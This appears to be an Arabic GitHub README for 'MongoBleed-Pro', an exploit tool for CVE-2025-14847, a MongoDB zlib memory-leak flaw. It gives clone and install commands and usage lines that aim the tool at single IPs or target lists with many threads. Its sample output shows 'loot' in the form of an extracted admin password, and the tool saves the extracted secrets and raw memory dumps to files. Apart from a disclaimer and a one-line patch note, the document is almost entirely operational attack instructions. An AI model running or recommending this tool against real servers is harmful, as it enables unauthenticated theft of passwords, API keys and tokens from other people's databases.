
أداة استغلال لـ CVE-2025-14847، ثغرة تسريب ذاكرة في MongoDB. تستخرج الأسرار مثل كلمات المرور ومفاتيح API والرموز من الحالات الضعيفة عبر فحص الذاكرة متعدد الخيوط.
أداة متقدمة لاستغلال تسرب الذاكرة في MongoDB
استمر في التعلم | استمر في الاختراق مع Alexcyberx
MongoBleed-Pro هي أداة استغلال متطورة لـ CVE-2025-14847، وهي ثغرة حرجة في تسرب الذاكرة في معالجة ضغط zlib في MongoDB. تسمح هذه الأداة لباحثي الأمن باستخراج بيانات حساسة من مثيلات MongoDB القابلة للاستغلال.
هذه الأداة مخصصة لأغراض الاختبار الأمني المصرّح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على التصريح المناسب قبل الاختبار.
| الخاصية | التفاصيل |
|---|---|
| CVE ID | CVE-2025-14847 |
| نوع الثغرة | تسرب الذاكرة |
| الإصدارات المتأثرة | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| السبب الجذري | قراءة زائدة في المخزن المؤقت أثناء فك ضغط zlib |
| التأثير | تسرب ذاكرة عن بُعد دون مصادقة |
# استنساخ المستودع
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# تثبيت التبعيات
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| الملف | الوصف |
|---|---|
loot_<host>.txt | الأسرار المستخرجة بتنسيق قابل للقراءة |
dump_<host>.bin | تفريغ الذاكرة الخام للتحليل اليدوي |
إذا كنت مسؤول MongoDB، قم بالتحديث إلى الإصدارات المصححة:
alexcyberx
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.
إذا وجدت هذه الأداة مفيدة، يرجى منحها ⭐ على GitHub!
「 استمر في التعلم | استمر في الاختراق 」
صنع بـ ❤️ بواسطة alexcyberx
| الوسيط | الوصف | الافتراضي |
|---|
--target | عنوان IP/URL الهدف | إدخال تفاعلي |
--file | ملف بقائمة الأهداف | لا شيء |
--threads | عدد الخيوط | 50 |
--min-offset | أقل إزاحة للذاكرة | 20 |
--max-offset | أقصى إزاحة للذاكرة | 8192 |